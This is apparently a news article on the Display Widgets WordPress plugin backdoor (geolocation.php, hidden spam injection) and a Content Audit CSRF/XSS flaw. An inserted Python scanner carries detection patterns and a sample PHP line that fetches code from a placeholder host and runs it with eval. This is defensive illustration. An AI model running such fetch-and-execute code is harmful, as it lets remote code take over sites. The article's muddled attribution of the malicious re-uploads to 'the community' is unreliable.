IS IT POSSIBLE?
Yes, it's possible in cyberspace. And they are not doing this with malware or adware. It's through a backdoor, installed by the authors of plugins affiliated with the WordPress community.
Researchers at Wordfence found this and notified the WordPress community about the severity of the flaw a month ago. According to the researchers, around 200,000 WordPress websites (a figure the researchers took from the WordPress plugin repository) use the vulnerable feature to display content.
They also claimed that the plugin's authors have been using this as a backdoor to publish spam in those widgets.
Recently, on 12 September this year, Wordfence founder Mark Maunder wrote a blog post about the flaw and described the ongoing conflict between the firm and the plugin's authors.
According to the post, the vulnerable plugin was removed and re-added four times in the past three months. The dispute started on 21 June, when Display Widgets was sold to the community for enhanced news bulletins. The very next day, David Law, a UK-based researcher and SEO consultant, noticed something unusual about that creepy plugin: it had installed additional code from an external server. As soon as he found it, he emailed the community about the flaw.
In response to his findings, the team removed the plugin from the repository on 23 June. Seven days later, the developer released an updated version 2.6.1 of the plugin containing a malicious file called geolocation.php.
HOW IS THE UPDATE VULNERABLE?
The file 'geolocation.php' is in fact a backdoor that rolls out a red carpet for the plugin author to post his/her views or ideas on any site running the plugin. Beyond its backdoor features, it strips the site administrator of the right to post and remove that content.
In effect, actors can become editors of media outlets through this widget flaw. The most alarming part is the anonymity the actor keeps: whatever the actor injects into the widget cannot be seen by the site administrator or the editor in the bureau, unless s/he views the website from some other device.
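As an added defender-side illustration (not code from the article, Wordfence or the plugin), the following scan walks a WordPress plugins directory for the two indicators described above: a geolocation.php file shipped inside the Display Widgets plugin, and plugin code that fetches further code from an external server and runs it. The sample plugin tree and the fetch-plus-eval heuristic are constructed assumptions, not the real plugin's contents.

```python
"""Heuristic scan of a WordPress plugins directory for the indicators the
article describes. Constructed example; patterns are assumptions, not taken
from the actual Display Widgets code."""
import os
import re
import tempfile

# Heuristic: PHP that fetches a remote URL and then executes what it received.
REMOTE_FETCH = re.compile(r"(file_get_contents|curl_init|wp_remote_get)\s*\(\s*['\"]https?://", re.I)
DYNAMIC_EXEC = re.compile(r"\b(eval|create_function|assert)\s*\(", re.I)


def scan_plugins(plugins_dir):
    """Return a sorted list of (relative_path, reason) findings."""
    findings = []
    for root, _dirs, files in os.walk(plugins_dir):
        for name in files:
            path = os.path.join(root, name)
            rel = os.path.relpath(path, plugins_dir).replace(os.sep, "/")
            parts = rel.split("/")
            # Indicator named in the article: geolocation.php inside display-widgets.
            if parts[0] == "display-widgets" and name == "geolocation.php":
                findings.append((rel, "geolocation.php present in display-widgets"))
            if not name.endswith(".php"):
                continue
            with open(path, encoding="utf-8", errors="replace") as fh:
                src = fh.read()
            if REMOTE_FETCH.search(src) and DYNAMIC_EXEC.search(src):
                findings.append((rel, "remote fetch combined with dynamic execution"))
    return sorted(findings)


def demo():
    """Build a constructed sample tree (not real plugin code) and scan it."""
    base = tempfile.mkdtemp()
    os.makedirs(os.path.join(base, "display-widgets"))
    os.makedirs(os.path.join(base, "hello-dolly"))
    with open(os.path.join(base, "display-widgets", "geolocation.php"), "w") as fh:
        fh.write("<?php $c = file_get_contents('http://example.invalid/x'); eval($c);")
    with open(os.path.join(base, "hello-dolly", "hello.php"), "w") as fh:
        fh.write("<?php echo 'benign';")
    return scan_plugins(base)


if __name__ == "__main__":
    for rel, reason in demo():
        print(rel, "-", reason)
```

The author's own advice in the comment quoted later, checking the wp_options table for leftovers, complements this file-level check, since injected widget content is stored there rather than in plugin files.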
DOES THE PLAY GET OVER?
No, it is still going on. The UK researcher contacted the community again and explained the implications of the privacy flaw. The forum removed the vulnerable plugin on 1 July and re-added it on 6 July as updated version 2.6.2 - but with the same flaw. When the researcher tried to bring the flaw to their notice, the community refused to listen to him.
A few weeks later, on 23 July, another user, Calvin Ngan, contacted the team to report the spam content injection flaw in the updated plugin. The community immediately removed it once again, then added it back on 2 September with malicious code at line 117.
Once more, another forum member reported the injection flaw in the widget on 7 September. The very next day, the plugin author responded with a comment: 'Thank you for letting me know. Yes, the last update fixed this; you need to clear your cache and update to the latest version. As I mentioned in the changelog, I asked a friend of mine to review the code and he gave me a full report. You can look at the wp_options table for leftovers, and if you don’t find anything then you should be okay,' the comment reads.
Another researcher, Tom Adams of the Packet Storm community, found a further flaw, this time in the Content Audit plugin. This common kind of flaw lets a hacker play the role of editor at a news desk. The researcher found it a month back and reported it to the community. The flaw, filed as 'Content Audit 1.9.1' CSRF/XSS with the WordPress community, could allow an unauthenticated attacker to do everything a site admin can. As soon as it was reported, the plugin was removed.
WILL THE PLAY CONTINUE?
According to media reports, a few other flaws in widgets have been found, but the community team has fixed them in the latest updates.